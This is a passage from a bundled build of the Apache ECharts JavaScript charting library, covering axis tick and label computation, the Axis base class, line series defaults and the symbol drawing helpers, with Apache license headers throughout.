labelModel.get('showMinLabel') || showAllLabel;\n    var includeMaxLabel = labelModel.get('showMaxLabel') || showAllLabel;\n\n    if (includeMinLabel && startTick !== ordinalExtent[0]) {\n        addItem(ordinalExtent[0]);\n    }\n\n    // Optimize: avoid generating large array by `ordinalScale.getTicks()`.\n    var tickValue = startTick;\n    for (; tickValue <= ordinalExtent[1]; tickValue += step) {\n        addItem(tickValue);\n    }\n\n    if (includeMaxLabel && tickValue - step !== ordinalExtent[1]) {\n        addItem(ordinalExtent[1]);\n    }\n\n    function addItem(tVal) {\n        result.push(onlyTick\n            ? tVal\n            : {\n                formattedLabel: labelFormatter(tVal),\n                rawLabel: ordinalScale.getLabel(tVal),\n                tickValue: tVal\n            }\n        );\n    }\n\n    return result;\n}\n\n// When interval is function, the result `false` means ignore the tick.\n// It is time consuming for large category data.\nfunction makeLabelsByCustomizedCategoryInterval(axis, categoryInterval, onlyTick) {\n    var ordinalScale = axis.scale;\n    var labelFormatter = makeLabelFormatter(axis);\n    var result = [];\n\n    each$1(ordinalScale.getTicks(), function (tickValue) {\n        var rawLabel = ordinalScale.getLabel(tickValue);\n        if (categoryInterval(tickValue, rawLabel)) {\n            result.push(onlyTick\n                ? tickValue\n                : {\n                    formattedLabel: labelFormatter(tickValue),\n                    rawLabel: rawLabel,\n                    tickValue: tickValue\n                }\n            );\n        }\n    });\n\n    return result;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar NORMALIZED_EXTENT = [0, 1];\n\n/**\n * Base class of Axis.\n * @constructor\n */\nvar Axis = function (dim, scale, extent) {\n\n    /**\n     * Axis dimension. Such as 'x', 'y', 'z', 'angle', 'radius'.\n     * @type {string}\n     */\n    this.dim = dim;\n\n    /**\n     * Axis scale\n     * @type {module:echarts/coord/scale/*}\n     */\n    this.scale = scale;\n\n    /**\n     * @type {Array.<number>}\n     * @private\n     */\n    this._extent = extent || [0, 0];\n\n    /**\n     * @type {boolean}\n     */\n    this.inverse = false;\n\n    /**\n     * Usually true when axis has a ordinal scale\n     * @type {boolean}\n     */\n    this.onBand = false;\n};\n\nAxis.prototype = {\n\n    constructor: Axis,\n\n    /**\n     * If axis extent contain given coord\n     * @param {number} coord\n     * @return {boolean}\n     */\n    contain: function (coord) {\n        var extent = this._extent;\n        var min = Math.min(extent[0], extent[1]);\n        var max = Math.max(extent[0], extent[1]);\n        return coord >= min && coord <= max;\n    },\n\n    /**\n     * If axis extent contain given data\n     * @param {number} data\n     * @return {boolean}\n     */\n    containData: function (data) {\n        return this.scale.contain(data);\n    },\n\n    /**\n     * Get coord extent.\n     * @return {Array.<number>}\n     */\n    getExtent: function () {\n        return this._extent.slice();\n    },\n\n    /**\n     * Get precision used for formatting\n     * @param {Array.<number>} [dataExtent]\n     * @return {number}\n     */\n    getPixelPrecision: function (dataExtent) {\n        return getPixelPrecision(\n            dataExtent || this.scale.getExtent(),\n            this._extent\n        );\n    },\n\n    /**\n     * Set coord extent\n     * @param {number} start\n     * @param {number} end\n     */\n    setExtent: function (start, end) {\n        var extent = this._extent;\n        extent[0] = start;\n        extent[1] = end;\n    },\n\n    /**\n     * Convert data to coord. Data is the rank if it has an ordinal scale\n     * @param {number} data\n     * @param  {boolean} clamp\n     * @return {number}\n     */\n    dataToCoord: function (data, clamp) {\n        var extent = this._extent;\n        var scale = this.scale;\n        data = scale.normalize(data);\n\n        if (this.onBand && scale.type === 'ordinal') {\n            extent = extent.slice();\n            fixExtentWithBands(extent, scale.count());\n        }\n\n        return linearMap(data, NORMALIZED_EXTENT, extent, clamp);\n    },\n\n    /**\n     * Convert coord to data. Data is the rank if it has an ordinal scale\n     * @param {number} coord\n     * @param  {boolean} clamp\n     * @return {number}\n     */\n    coordToData: function (coord, clamp) {\n        var extent = this._extent;\n        var scale = this.scale;\n\n        if (this.onBand && scale.type === 'ordinal') {\n            extent = extent.slice();\n            fixExtentWithBands(extent, scale.count());\n        }\n\n        var t = linearMap(coord, extent, NORMALIZED_EXTENT, clamp);\n\n        return this.scale.scale(t);\n    },\n\n    /**\n     * Convert pixel point to data in axis\n     * @param {Array.<number>} point\n     * @param  {boolean} clamp\n     * @return {number} data\n     */\n    pointToData: function (point, clamp) {\n        // Should be implemented in derived class if necessary.\n    },\n\n    /**\n     * Different from `zrUtil.map(axis.getTicks(), axis.dataToCoord, axis)`,\n     * `axis.getTicksCoords` considers `onBand`, which is used by\n     * `boundaryGap:true` of category axis and splitLine and splitArea.\n     * @param {Object} [opt]\n     * @param {Model} [opt.tickModel=axis.model.getModel('axisTick')]\n     * @param {boolean} [opt.clamp] If `true`, the first and the last\n     *        tick must be at the axis end points. Otherwise, clip ticks\n     *        that outside the axis extent.\n     * @return {Array.<Object>} [{\n     *     coord: ...,\n     *     tickValue: ...\n     * }, ...]\n     */\n    getTicksCoords: function (opt) {\n        opt = opt || {};\n\n        var tickModel = opt.tickModel || this.getTickModel();\n        var result = createAxisTicks(this, tickModel);\n        var ticks = result.ticks;\n\n        var ticksCoords = map(ticks, function (tickValue) {\n            return {\n                coord: this.dataToCoord(tickValue),\n                tickValue: tickValue\n            };\n        }, this);\n\n        var alignWithLabel = tickModel.get('alignWithLabel');\n\n        fixOnBandTicksCoords(\n            this, ticksCoords, alignWithLabel, opt.clamp\n        );\n\n        return ticksCoords;\n    },\n\n    /**\n     * @return {Array.<Array.<Object>>} [{ coord: ..., tickValue: ...}]\n     */\n    getMinorTicksCoords: function () {\n        if (this.scale.type === 'ordinal') {\n            // Category axis doesn't support minor ticks\n            return [];\n        }\n\n        var minorTickModel = this.model.getModel('minorTick');\n        var splitNumber = minorTickModel.get('splitNumber');\n        // Protection.\n        if (!(splitNumber > 0 && splitNumber < 100)) {\n            splitNumber = 5;\n        }\n        var minorTicks = this.scale.getMinorTicks(splitNumber);\n        var minorTicksCoords = map(minorTicks, function (minorTicksGroup) {\n            return map(minorTicksGroup, function (minorTick) {\n                return {\n                    coord: this.dataToCoord(minorTick),\n                    tickValue: minorTick\n                };\n            }, this);\n        }, this);\n        return minorTicksCoords;\n    },\n\n    /**\n     * @return {Array.<Object>} [{\n     *     formattedLabel: string,\n     *     rawLabel: axis.scale.getLabel(tickValue)\n     *     tickValue: number\n     * }, ...]\n     */\n    getViewLabels: function () {\n        return createAxisLabels(this).labels;\n    },\n\n    /**\n     * @return {module:echarts/coord/model/Model}\n     */\n    getLabelModel: function () {\n        return this.model.getModel('axisLabel');\n    },\n\n    /**\n     * Notice here we only get the default tick model. For splitLine\n     * or splitArea, we should pass the splitLineModel or splitAreaModel\n     * manually when calling `getTicksCoords`.\n     * In GL, this method may be overrided to:\n     * `axisModel.getModel('axisTick', grid3DModel.getModel('axisTick'));`\n     * @return {module:echarts/coord/model/Model}\n     */\n    getTickModel: function () {\n        return this.model.getModel('axisTick');\n    },\n\n    /**\n     * Get width of band\n     * @return {number}\n     */\n    getBandWidth: function () {\n        var axisExtent = this._extent;\n        var dataExtent = this.scale.getExtent();\n\n        var len = dataExtent[1] - dataExtent[0] + (this.onBand ? 1 : 0);\n        // Fix #2728, avoid NaN when only one data.\n        len === 0 && (len = 1);\n\n        var size = Math.abs(axisExtent[1] - axisExtent[0]);\n\n        return Math.abs(size) / len;\n    },\n\n    /**\n     * @abstract\n     * @return {boolean} Is horizontal\n     */\n    isHorizontal: null,\n\n    /**\n     * @abstract\n     * @return {number} Get axis rotate, by degree.\n     */\n    getRotate: null,\n\n    /**\n     * Only be called in category axis.\n     * Can be overrided, consider other axes like in 3D.\n     * @return {number} Auto interval for cateogry axis tick and label\n     */\n    calculateCategoryInterval: function () {\n        return calculateCategoryInterval(this);\n    }\n\n};\n\nfunction fixExtentWithBands(extent, nTick) {\n    var size = extent[1] - extent[0];\n    var len = nTick;\n    var margin = size / len / 2;\n    extent[0] += margin;\n    extent[1] -= margin;\n}\n\n// If axis has labels [1, 2, 3, 4]. Bands on the axis are\n// |---1---|---2---|---3---|---4---|.\n// So the displayed ticks and splitLine/splitArea should between\n// each data item, otherwise cause misleading (e.g., split tow bars\n// of a single data item when there are two bar series).\n// Also consider if tickCategoryInterval > 0 and onBand, ticks and\n// splitLine/spliteArea should layout appropriately corresponding\n// to displayed labels. (So we should not use `getBandWidth` in this\n// case).\nfunction fixOnBandTicksCoords(axis, ticksCoords, alignWithLabel, clamp) {\n    var ticksLen = ticksCoords.length;\n\n    if (!axis.onBand || alignWithLabel || !ticksLen) {\n        return;\n    }\n\n    var axisExtent = axis.getExtent();\n    var last;\n    var diffSize;\n    if (ticksLen === 1) {\n        ticksCoords[0].coord = axisExtent[0];\n        last = ticksCoords[1] = {coord: axisExtent[0]};\n    }\n    else {\n        var crossLen = ticksCoords[ticksLen - 1].tickValue - ticksCoords[0].tickValue;\n        var shift = (ticksCoords[ticksLen - 1].coord - ticksCoords[0].coord) / crossLen;\n\n        each$1(ticksCoords, function (ticksItem) {\n            ticksItem.coord -= shift / 2;\n        });\n\n        var dataExtent = axis.scale.getExtent();\n        diffSize = 1 + dataExtent[1] - ticksCoords[ticksLen - 1].tickValue;\n\n        last = {coord: ticksCoords[ticksLen - 1].coord + shift * diffSize};\n\n        ticksCoords.push(last);\n    }\n\n    var inverse = axisExtent[0] > axisExtent[1];\n\n    // Handling clamp.\n    if (littleThan(ticksCoords[0].coord, axisExtent[0])) {\n        clamp ? (ticksCoords[0].coord = axisExtent[0]) : ticksCoords.shift();\n    }\n    if (clamp && littleThan(axisExtent[0], ticksCoords[0].coord)) {\n        ticksCoords.unshift({coord: axisExtent[0]});\n    }\n    if (littleThan(axisExtent[1], last.coord)) {\n        clamp ? (last.coord = axisExtent[1]) : ticksCoords.pop();\n    }\n    if (clamp && littleThan(last.coord, axisExtent[1])) {\n        ticksCoords.push({coord: axisExtent[1]});\n    }\n\n    function littleThan(a, b) {\n        // Avoid rounding error cause calculated tick coord different with extent.\n        // It may cause an extra unecessary tick added.\n        a = round$1(a);\n        b = round$1(b);\n        return inverse ? a > b : a < b;\n    }\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Do not mount those modules on 'src/echarts' for better tree shaking.\n */\n\nvar parseGeoJson = parseGeoJson$1;\n\nvar ecUtil = {};\neach$1(\n    [\n        'map', 'each', 'filter', 'indexOf', 'inherits', 'reduce', 'filter',\n        'bind', 'curry', 'isArray', 'isString', 'isObject', 'isFunction',\n        'extend', 'defaults', 'clone', 'merge'\n    ],\n    function (name) {\n        ecUtil[name] = zrUtil[name];\n    }\n);\nvar graphic$1 = {};\neach$1(\n    [\n        'extendShape', 'extendPath', 'makePath', 'makeImage',\n        'mergePath', 'resizePath', 'createIcon',\n        'setHoverStyle', 'setLabelStyle', 'setTextStyle', 'setText',\n        'getFont', 'updateProps', 'initProps', 'getTransform',\n        'clipPointsByRect', 'clipRectByRect',\n        'registerShape', 'getShapeClass',\n        'Group',\n        'Image',\n        'Text',\n        'Circle',\n        'Sector',\n        'Ring',\n        'Polygon',\n        'Polyline',\n        'Rect',\n        'Line',\n        'BezierCurve',\n        'Arc',\n        'IncrementalDisplayable',\n        'CompoundPath',\n        'LinearGradient',\n        'RadialGradient',\n        'BoundingRect'\n    ],\n    function (name) {\n        graphic$1[name] = graphic[name];\n    }\n);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nSeriesModel.extend({\n\n    type: 'series.line',\n\n    dependencies: ['grid', 'polar'],\n\n    getInitialData: function (option, ecModel) {\n        if (__DEV__) {\n            var coordSys = option.coordinateSystem;\n            if (coordSys !== 'polar' && coordSys !== 'cartesian2d') {\n                throw new Error('Line not support coordinateSystem besides cartesian and polar');\n            }\n        }\n        return createListFromArray(this.getSource(), this, {useEncodeDefaulter: true});\n    },\n\n    defaultOption: {\n        zlevel: 0,\n        z: 2,\n        coordinateSystem: 'cartesian2d',\n        legendHoverLink: true,\n\n        hoverAnimation: true,\n        // stack: null\n        // xAxisIndex: 0,\n        // yAxisIndex: 0,\n\n        // polarIndex: 0,\n\n        // If clip the overflow value\n        clip: true,\n        // cursor: null,\n\n        label: {\n            position: 'top'\n        },\n        // itemStyle: {\n        // },\n\n        lineStyle: {\n            width: 2,\n            type: 'solid'\n        },\n        // areaStyle: {\n            // origin of areaStyle. Valid values:\n            // `'auto'/null/undefined`: from axisLine to data\n            // `'start'`: from min to data\n            // `'end'`: from data to max\n            // origin: 'auto'\n        // },\n        // false, 'start', 'end', 'middle'\n        step: false,\n\n        // Disabled if step is true\n        smooth: false,\n        smoothMonotone: null,\n        symbol: 'emptyCircle',\n        symbolSize: 4,\n        symbolRotate: null,\n\n        showSymbol: true,\n        // `false`: follow the label interval strategy.\n        // `true`: show all symbols.\n        // `'auto'`: If possible, show all symbols, otherwise\n        //           follow the label interval strategy.\n        showAllSymbol: 'auto',\n\n        // Whether to connect break point.\n        connectNulls: false,\n\n        // Sampling for large data. Can be: 'average', 'max', 'min', 'sum'.\n        sampling: 'none',\n\n        animationEasing: 'linear',\n\n        // Disable progressive\n        progressive: 0,\n        hoverLayerThreshold: Infinity\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @param {module:echarts/data/List} data\n * @param {number} dataIndex\n * @return {string} label string. Not null/undefined\n */\nfunction getDefaultLabel(data, dataIndex) {\n    var labelDims = data.mapDimension('defaultedLabel', true);\n    var len = labelDims.length;\n\n    // Simple optimization (in lots of cases, label dims length is 1)\n    if (len === 1) {\n        return retrieveRawValue(data, dataIndex, labelDims[0]);\n    }\n    else if (len) {\n        var vals = [];\n        for (var i = 0; i < labelDims.length; i++) {\n            var val = retrieveRawValue(data, dataIndex, labelDims[i]);\n            vals.push(val);\n        }\n        return vals.join(' ');\n    }\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @module echarts/chart/helper/Symbol\n */\n\n/**\n * @constructor\n * @alias {module:echarts/chart/helper/Symbol}\n * @param {module:echarts/data/List} data\n * @param {number} idx\n * @extends {module:zrender/graphic/Group}\n */\nfunction SymbolClz$1(data, idx, seriesScope) {\n    Group.call(this);\n    this.updateData(data, idx, seriesScope);\n}\n\nvar symbolProto = SymbolClz$1.prototype;\n\n/**\n * @public\n * @static\n * @param {module:echarts/data/List} data\n * @param {number} dataIndex\n * @return {Array.<number>} [width, height]\n */\nvar getSymbolSize = SymbolClz$1.getSymbolSize = function (data, idx) {\n    var symbolSize = data.getItemVisual(idx, 'symbolSize');\n    return symbolSize instanceof Array\n        ? symbolSize.slice()\n        : [+symbolSize, +symbolSize];\n};\n\nfunction getScale(symbolSize) {\n    return [symbolSize[0] / 2, symbolSize[1] / 2];\n}\n\nfunction driftSymbol(dx, dy) {\n    this.parent.drift(dx, dy);\n}\n\nsymbolProto._createSymbol = function (\n    symbolType,\n    data,\n    idx,\n    symbolSize,\n    keepAspect\n) {\n    // Remove paths created before\n    this.removeAll();\n\n    var color = data.getItemVisual(idx, 'color');\n\n    // var symbolPath = createSymbol(\n    //     symbolType, -0.5, -0.5, 1, 1, color\n    // );\n    // If width/height are set too small (e.g., set to 1) on ios10\n    // and macOS Sierra, a circle stroke become a rect, no matter what\n    // the scale is set. So we set width/height as 2. See #4150.\n    var symbolPath = createSymbol(\n        symbolType, -1, -1, 2, 2, color, keepAspect\n    );\n\n    symbolPath.attr({\n        z2: 100,\n        culling: true,\n        scale: getScale(symbolSize)\n    });\n    // Rewrite drift method\n    symbolPath.drift = driftSymbol;\n\n    this._symbolType = symbolType;\n\n    this.add(symbolPath);\n};\n\n/**\n * Stop animation\n * @param {boolean} toLastFrame\n */\nsymbolProto.stopSymbolAnimation = function (toLastFrame) {\n    this.childAt(0).stopAnimation(toLastFrame);\n};\n\n/**\n * FIXME:\n * Caution: This method breaks the encapsulation of this module,\n * but it indeed brings convenience. So do not use the method\n * unless you detailedly know all the implements of `Symbol`,\n * especially animation.\n *\n * Get symbol path element.\n */\nsymbolProto.getSymbolPath = function () {\n    return this.childAt(0);\n};\n\n/**\n * Get scale(aka, current symbol size).\n * Including the change caused by animation\n */\nsymbolProto.getScale = function () {\n    return this.childAt(0).scale;\n};\n\n/**\n * Highlight symbol\n */\nsymbolProto.highlight = function () {\n    this.childAt(0).trigger('emphasis');\n};\n\n/**\n * Downplay symbol\n */\nsymbolProto.downplay = function () {\n    this.childAt(0).trigger('normal');\n};\n\n/**\n * @param {number} zlevel\n * @param {number} z\n */\nsymbolProto.setZ = function (zlevel, z) {\n    var symbolPath = this.childAt(0);\n    symbolPath.zlevel = zlevel;\n    symbolPath.z = z;\n};\n\nsymbolProto.setDraggable = function (draggable) {\n    var symbolPath = this.childAt(0);\n    symbolPath.draggable = draggable;\n    symbolPath.cursor = draggable ? 'move' : symbolPath.cursor;\n};\n\n/**\n * Update symbol properties\n * @param {module:echarts/data/List} data\n * @param {number} idx\n * @param {Object} [seriesScope]\n * @param {Object} [seriesScope.itemStyle]\n * @param {Object} [seriesScope.hoverItemStyle]\n * @param {Object} [seriesScope.symbolRotate]\n * @param {Object} [seriesScope.symbolOffset]\n * @param {module:echarts/model/Model} [seriesScope.labelModel]\n * @param {module:echarts/model/Model} [seriesScope.hoverLabelModel]\n * @param {boolean} [seriesScope.hoverAnimation]\n * @param {Object} [seriesScope.cursorStyle]\n * @param {module:echarts/model/Model} [seriesScope.itemModel]\n * @param {string} [seriesScope.symbolInnerColor]\n * @param {Object} [seriesScope.fadeIn=false]\n */\nsymbolProto.updateData = function (data, idx, seriesScope) {\n    this.silent = false;\n\n    var symbolType = data.getItemVisual(idx, 'symbol') || 'circle';\n    var seriesModel = data.hostModel;\n    var symbolSize = getSymbolSize(data, idx);\n    var isInit = symbolType !== this._symbolType;\n\n    if (isInit) {\n        var keepAspect = data.getItemVisual(idx, 'symbolKeepAspect');\n        this._createSymbol(symbolType, data, idx, symbolSize, keepAspect);\n    }\n    else {\n        var symbolPath = this.childAt(0);\n        symbolPath.silent = false;\n        updateProps(symbolPath, {\n            scale: getScale(symbolSize)\n        }, seriesModel, idx);\n    }\n\n    this._updateCommon(data, idx, symbolSize, seriesScope);\n\n    if (isInit) {\n        var symbolPath = this.childAt(0);\n        var fadeIn = seriesScope && seriesScope.fadeIn;\n\n        var target = {scale: symbolPath.scale.slice()};\n        fadeIn && (target.style = {opacity: symbolPath.style.opacity});\n\n        symbolPath.scale = [0, 0];\n        fadeIn && (symbolPath.style.opacity = 0);\n\n        initProps(symbolPath, target, seriesModel, idx);\n    }\n\n    this._seriesModel = seriesModel;\n};\n\n// Update common properties\nvar normalStyleAccessPath = ['itemStyle'];\nvar emphasisStyleAccessPath = ['emphasis', 'itemStyle'];\nvar normalLabelAccessPath = ['label'];\nvar emphasisLabelAccessPath = ['emphasis', 'label'];\n\n/**\n * @param {module:echarts/data/List} data\n * @param {number} idx\n * @param {Array.<number>} symbolSize\n * @param {Object} [seriesScope]\n */\nsymbolProto._updateCommon = function (data, idx, symbolSize, seriesScope) {\n    var symbolPath = this.childAt(0);\n    var seriesModel = data.hostModel;\n    var color = data.getItemVisual(idx, 'color');\n\n    // Reset style\n    if (symbolPath.type !== 'image') {\n        symbolPath.useStyle({\n            strokeNoScale: true\n        });\n    }\n    else {\n        symbolPath.setStyle({\n            opacity: null,\n            shadowBlur: null,\n            shadowOffsetX: null,\n            shadowOffsetY: null,\n            shadowColor: null\n        });\n    }\n\n    var itemStyle = seriesScope && seriesScope.itemStyle;\n    var hoverItemStyle = seriesScope && seriesScope.hoverItemStyle;\n    var symbolRotate = seriesScope && seriesScope.symbolRotate;\n    var symbolOffset = seriesScope && seriesScope.symbolOffset;\n    var labelModel = seriesScope && seriesScope.labelModel;\n    var hoverLabelModel = seriesScope && seriesScope.hoverLabelModel;\n    var hoverAnimation = seriesScope && seriesScope.hoverAnimation;\n    var cursorStyle = seriesScope && seriesScope.cursorStyle;\n\n    if (!seriesScope || data.hasItemOption) {\n        var itemModel = (seriesScope && seriesScope.itemModel)\n            ? seriesScope.itemModel : data.getItemModel(idx);\n\n        // Color must be excluded.\n        // Because symbol provide setColor individually to set fill and stroke\n        itemStyle = itemModel.getModel(normalStyleAccessPath).getItemStyle(['color']);\n        hoverItemStyle = itemModel.getModel(emphasisStyleAccessPath).getItemStyle();\n\n        symbolRotate = itemModel.getShallow('symbolRotate');\n        symbolOffset = itemModel.getShallow('symbolOffset');\n\n        labelModel = itemModel.getModel(normalLabelAccessPath);\n        hoverLabelModel = itemModel.getModel(emphasisLabelAccessPath);\n        hoverAnimation = itemModel.getShallow('hoverAnimation');\n        cursorStyle = itemModel.getShallow('cursor');\n    }\n    else {\n        hoverItemStyle = extend({}, hoverItemStyle);\n    }\n\n    var elStyle = symbolPath.style;\n\n    symbolPath.attr('rotation', (symbolRotate || 0) * Math.PI / 180 || 0);\n\n    if (symbolOffset) {\n        symbolPath.attr('position', [\n            parsePercent$1(symbolOffset[0], symbolSize[0]),\n            parsePercent$1(symbolOffset[1], symbolSize[1])\n        ]);\n    }\n\n    cursorStyle && symbolPath.attr('cursor', cursorStyle);\n\n    // PENDING setColor before setStyle!!!\n    symbolPath.setColor(color, seriesScope && seriesScope.symbolInnerColor);\n\n    symbolPath.setStyle(itemStyle);\n\n    var opacity = data.getItemVisual(idx, 'opacity');\n    if (opacity != null) {\n        elStyle.opacity = opacity;\n    }\n\n    var liftZ = data.getItemVisual(idx, 'liftZ');\n    var z2Origin = symbolPath.__z2Origin;\n    if (liftZ != null) {\n        if (z2Origin == null) {\n            symbolPath.__z2Origin = symbolPath.z2;\n            symbolPath.z2 += liftZ;\n        }\n    }\n    else if (z2Origin != null) {\n        symbolPath.z2 = z2Origin;\n        symbolPath.__z2Origin = null;\n    }\n\n    var useNameLabel = seriesScope && seriesScope.useNameLabel;\n\n    setLabelStyle(\n        elStyle, hoverItemStyle, labelModel, hoverLabelModel,\n        {\n            labelFetcher: seriesModel,\n            labelDataIndex: idx,\n            defaultText: getLabelDefaultText,\n            isRectText: true,\n            autoColor: color\n        }\n    );\n\n    // Do not execute util needed.\n    function getLabelDefaultText(idx, opt) {\n        return useNameLabel ? data.getName(idx) : getDefaultLabel(data, idx);\n    }\n\n    symbolPath.__symbolOriginalScale = getScale(symbolSize);\n    symbolPath.hoverStyle = hoverItemStyle;\n    symbolPath.highDownOnUpdate = (\n        hoverAnimation && seriesModel.isAnimationEnabled()\n    ) ? highDownOnUpdate : null;\n\n    setHoverStyle(symbolPath);\n};\n\nfunction highDownOnUpdate(fromState, toState) {\n    // Do not support this hover animation util some scenario required.\n    // Animation can only be supported in hover layer when using `el.incremetal`.\n    if (this.incremental || this.useHoverLayer) {\n        return;\n    }\n\n    if (toState === 'emphasis') {\n        var scale = this.__symbolOriginalScale;\n        var ratio = scale[1] / scale[0];\n        var emphasisOpt = {\n            scale: [\n                Math.max(scale[0] * 1.1, scale[0] + 3),\n                Math.max(scale[1] * 1.1, scale[1] + 3 * ratio)\n            ]\n        };\n        // FIXME\n        // modify it after support stop specified animation.\n        // toState === fromState\n        //     ? (this.stopAnimation(), this.attr(emphasisOpt))\n        this.animateTo(emphasisOpt, 400, 'elasticOut');\n    }\n    else if (toState === 'normal') {\n        this.animateTo({\n            scale: this.__symbolOriginalScale\n        }, 400, 'elasticOut');\n    }\n}\n\n/**\n * @param {Function} cb\n * @param {Object} [opt]\n * @param {Object} [opt.keepLabel=true]\n */\nsymbolProto.fadeOut = function (cb, opt) {\n    var symbolPath = this.childAt(0);\n    // Avoid mistaken hover when fading out\n    this.silent = symbolPath.silent = true;\n    // Not show text when animating\n    !(opt && opt.keepLabel) && (symbolPath.style.text = null);\n\n    updateProps(\n        symbolPath,\n        {\n            style: {opacity: 0},\n            scale: [0, 0]\n        },\n        this._seriesModel,\n        this.dataIndex,\n        cb\n    );\n};\n\ninherits(SymbolClz$1, Group);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @module echarts/chart/helper/SymbolDraw\n */\n\n/**\n * @constructor\n * @alias module:echarts/chart/helper/SymbolDraw\n * @param {module:zrender/graphic/Group} [symbolCtor]\n */\nfunction SymbolDraw(symbolCtor) {\n    this.group = new Group();\n\n    this._symbolCtor = symbolCtor || SymbolClz$1;\n}\n\nvar symbolDrawProto = SymbolDraw.prototype;\n\nfunction symbolNeedsDraw(data, point, idx, opt) {\n    return point && !isNaN(point[0]) && !isNaN(point[1])\n        && !(opt.isIgnore && opt.isIgnore(idx))\n        // We do not set clipShape on group, because it will cut part of\n        // the symbol element shape. We use the same clip shape here as\n        // the line clip.\n        && !(opt.clipShape && !opt.clipShape.contain(point[0], point[1]))\n        && data.getItemVisual(idx, 'symbol') !== 'none';\n}\n\n/**\n * Update symbols draw by new data\n * @param {module:echarts/data/List} data\n * @param {Object} [opt] Or isIgnore\n * @param {Function} [opt.isIgnore]\n * @param {Object} [opt.clipShape]\n */\nsymbolDrawProto.updateData = function (data, opt) {\n    opt = normalizeUpdateOpt(opt);\n\n    var group = this.group;\n    var seriesModel = data.hostModel;\n    var oldData = this._data;\n    var SymbolCtor = this._symbolCtor;\n\n    var seriesScope = makeSeriesScope(data);\n\n    // There is no oldLineData only when first rendering or switching from\n    // stream mode to normal mode, where previous elements should be removed.\n    if (!oldData) {\n        group.removeAll();\n    }\n\n    data.diff(oldData)\n        .add(function (newIdx) {\n            var point = data.getItemLayout(newIdx);\n            if (symbolNeedsDraw(data, point, newIdx, opt)) {\n                var symbolEl = new SymbolCtor(data, newIdx, seriesScope);\n                symbolEl.attr('position', point);\n                data.setItemGraphicEl(newIdx, symbolEl);\n                group.add(symbolEl);\n            }\n        })\n        .update(function (newIdx, oldIdx) {\n            var symbolEl = oldData.getItemGraphicEl(oldIdx);\n            var point = data.getItemLayout(newIdx);\n            if (!symbolNeedsDraw(data, point, newIdx, opt)) {\n                group.remove(symbolEl);\n                return;\n            }\n            if (!symbolEl) {\n                symbolEl = new SymbolCtor(data, newIdx);\n                symbolEl.attr('position', point);\n            }\n            else {\n                symbolEl.updateData(data, newIdx, seriesScope);\n                updateProps(symbolEl, {\n                    position: point\n                }, seriesModel);\n            }\n\n            // Add back\n            group.add(symbolEl);\n\n            data.setItemGraphicEl(newIdx, symbolEl);\n        })\n        .remove(function (oldIdx) {\n            var el = oldData.getItemGraphicEl(oldIdx);\n            el && el.fadeOut(function () {\n                group.remove(el);\n            });\n        })\n        .execute();\n\n    this._data = data;\n};\n\nsymbolDrawProto.isPersistent = function () {\n    return true;\n};\n\nsymbolDrawProto.updateLayout = function () {\n    var data = 